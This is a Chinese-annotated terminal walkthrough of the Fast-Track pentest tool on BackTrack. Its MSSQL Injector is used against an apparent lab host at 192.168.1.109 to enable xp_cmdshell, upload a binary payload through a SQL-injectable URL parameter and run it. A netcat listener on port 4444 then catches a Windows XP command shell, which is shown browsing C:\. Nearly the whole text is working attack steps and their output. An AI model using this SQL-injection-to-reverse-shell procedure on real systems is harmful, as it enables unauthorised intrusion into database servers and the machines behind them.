fasttrack操作:
root@bt:~# cd /pentest/exploits/fasttrack/
root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
***********************************************
******* Performing dependency checks... *******
***********************************************
*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***
Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.
Your system has all requirements needed to run Fast-Track!
*****************************************************************
** **
** Fast-Track - A new beginning... **
** Version: 4.0.2 **
** Written by: David Kennedy (ReL1K) **
** Lead Developer: Joey Furr (j0fer) **
** http://www.secmaniac.com **
** **
*****************************************************************
Fast-Track Main Menu:
1. Fast-Track Updates
2. Autopwn Automation
3. Nmap Scripting Engine
4. Microsoft SQL Tools
5. Mass Client-Side Attack
6. Exploits
7. Binary to Hex Payload Converter
8. Payload Generator
9. Fast-Track Tutorials
10. Fast-Track Changelog
11. Fast-Track Credits
12. Exit Fast-Track
Enter the number: 4
*****************************************************************
** **
** Fast-Track - A new beginning... **
** Version: 4.0.2 **
** Written by: David Kennedy (ReL1K) **
** Lead Developer: Joey Furr (j0fer) **
** http://www.secmaniac.com **
** **
*****************************************************************
Microsoft SQL Attack Tools
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
(q)uit
Enter your choice : 1
*****************************************************************
** **
** Fast-Track - A new beginning... **
** Version: 4.0.2 **
** Written by: David Kennedy (ReL1K) **
** Lead Developer: Joey Furr (j0fer) **
** http://www.secmaniac.com **
** **
*****************************************************************
Enter which SQL Injector you want to use:
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
(q)uit
Enter your choice: 1
*****************************************************************
** **
** Fast-Track - A new beginning... **
** Version: 4.0.2 **
** Written by: David Kennedy (ReL1K) **
** Lead Developer: Joey Furr (j0fer) **
** http://www.secmaniac.com **
** **
*****************************************************************
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Requirements: PExpect
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module uses a reverse shell by using the binary2hex method for uploading.
It does not require FTP or any other service, instead we are using the debug
function in Windows to generate the executable.
You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE
So for example, when the tool asks you for the SQL Injectable URL, type:
http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter
Example:http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
<ctrl>-c to exit to Main Menu...
Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
/pentest/exploits/fasttrack/bin/ftsrc/sqlbinarypayload.py:74: DeprecationWarning: os.popen2 is deprecated. Use the subprocess module.
ncstarter=os.popen2('xterm -geometry 60x20 -bg black -fg green -fn *-fixed-*-*-*-20-* -T "Fast-Track Binary Payload SQL Injector" -e nc -lvp 4444 2> /dev/null')
Sending initial request to enable xp_cmdshell if disabled....
Sending first portion of payload (1/4)....
Sending second portion of payload (2/4)....
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
Running cleanup before executing the payload...
Running the payload on the server...
You should have a shell if everything went good..Might take a couple seconds
另外起一个bash,来运行nc:
root@bt:~# nc -l -p 4444
当fasttrack出现:
Running the payload on the server...
时,nc就连上了:
root@bt:~# nc -l -p 4444
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ..
cd ..
C:\WINDOWS>cd ..
cd ..
C:\>dir
dir
驱动器 C 中的卷没有标签。
卷的序列号是 3052-FA52
C:\ 的目录
2012-03-24 11:55 0 AUTOEXEC.BAT
2012-03-24 11:55 0 CONFIG.SYS
2012-03-24 11:59 <DIR> Documents and Settings
2013-07-02 21:45 <DIR> msf3
2012-08-07 03:10 176,204,554 msf3.zip
2004-12-29 13:07 61,440 nc.exe
2013-07-01 22:45 <DIR> Program Files
2013-05-01 22:15 16,232,448 python-2.7.4.msi
2013-07-06 17:57 <DIR> Python27
2013-04-07 21:03 70,402,968 SQL2000SP4.exe
2013-06-30 21:58 <DIR> SQL2KSP4
2013-06-30 21:53 <DIR> SQLEVAL
2011-03-22 17:38 349,280,992 sqleval.exe
2013-07-01 20:52 <DIR> WINDOWS
2013-05-22 20:55 20,868,704 Wireshark-win32-1.8.7.exe
8 个文件 633,051,106 字节
7 个目录 3,919,802,368 可用字节
C:\>exit
exit
root@bt:~#